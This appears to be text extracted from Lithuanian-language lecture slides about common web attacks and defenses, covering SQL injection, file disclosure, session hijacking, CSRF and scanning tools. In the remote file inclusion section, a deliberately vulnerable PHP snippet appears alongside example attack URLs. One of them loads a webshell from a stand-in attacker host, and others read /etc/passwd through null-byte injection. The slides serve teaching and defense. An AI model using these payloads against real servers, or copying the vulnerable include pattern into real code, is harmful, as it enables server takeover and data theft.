Professional Documents
Culture Documents
atakos
KOKIOS ATAKOS VYKDOMOS SAITYNE
IR KAIP SU JOMIS KOVOTI
1. Reputacija;
2. Nuostoliai klientui;
3. Serverio naudojimas kenkjikiems tikslams;
Kirminai internete
Atakos schema?
Kirminai internete
Interneto narykls,
Keleto ranki paeidiamumo analizei ir atak vykdymui,
Patirties ir gebjim bei trupuio laiko ;)
vedimo validacijos;
SQL injekcij;
Apsimetinjimo atakos;
Web serverio
konfigracijos
(netikusios)
URL
interpretavimo
atakos
Nepakankamo
vartotojo
vedimo
tikrinimo
URL
interpretavimo
atakos
vedimo
validacija
Iplsti
SQL
sakiniai
URL
interpretavimo
atakos
vedimo
validacija
SQL
injekcijos
URL skverbtis
http
/ pateikti.php
? pg=1
& produktas=5
silaulio rankiai
Programins rangos aptikimo (fingerprinting) skaneris;
Prievad skaneris;
Saityno paeidiamum skaneris;
Priemons URL, slapuk, header informacijos stebjimui ir
padirbinjimui;
OpenSSL, kt...
Keletas:
http://www.acunetix.com/vulnerability-scanner/
http://www.tenable.com/products/nessus/nessus-vulnerability-scanner
https://pentest-tools.com
CodeSecure pavyzdys
Atrasti paeidiamumai
Paeidiamum filtras:
Katalog narymas
Atskleisti serverio katalog struktr ir jos failus.
Fail atskleidimas
Danai paprasta atskleisti bendro naudojimo failus (nepriklausanius
iniatinklio sistemai):
Fail atskleidimas
Panaikinti tokius failus arba ikelti juos i iniatinklio serviso
pasiekiamumo rib;
Atjungti ne iniatinklio fail aptarnavim;
Taikyti griet serverio naudojimo politik.
RFI ataka
Remote file inclusion
<?php
$color = 'blue'; if (isset( $_GET['COLOR'] ) )
$color = $_GET['COLOR'];
include( $color . '.php' );
?>
...
<form method="get">
<select name="COLOR">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit"> </form>
/vulnerable.php?COLOR=http://evil.example.com/webshell.txt?
/vulnerable.php?COLOR=C:\\ftp\\upload\\exploit
/vulnerable.php?COLOR=C:\\notes.txt%00
/vulnerable.php?COLOR=/etc/passwd%00
vedimo validacija
Daugumos atak altinis;
duomen tipai;
duomen apibreimo sritys;
buferio dydiai;
metasimboliai;
vedimo validacija
Tinkama serverio konfigracija;
SQL injekcijos
Galima, kai URL parametrai naudojami SQL uklausose;
SQL injekcijos
Tinkama serverio konfigracija;
Sesij permimas
HTTP protokolas nesaugo bsenos (stateless);
Sesij permimas
Sesij mechanizmo realizavimas ir stebjimas serverio pusje;
CSRF
Prevencija:
Autentifikacija ne tik per slapukus, bet ir naudojant GET, POST;
Tikrinti uklausos altin;
riboti slapuk gyvavimo laik.
Pabaigai
iniatinklio sistem apsauga tampa vis sudtingesn;
Skms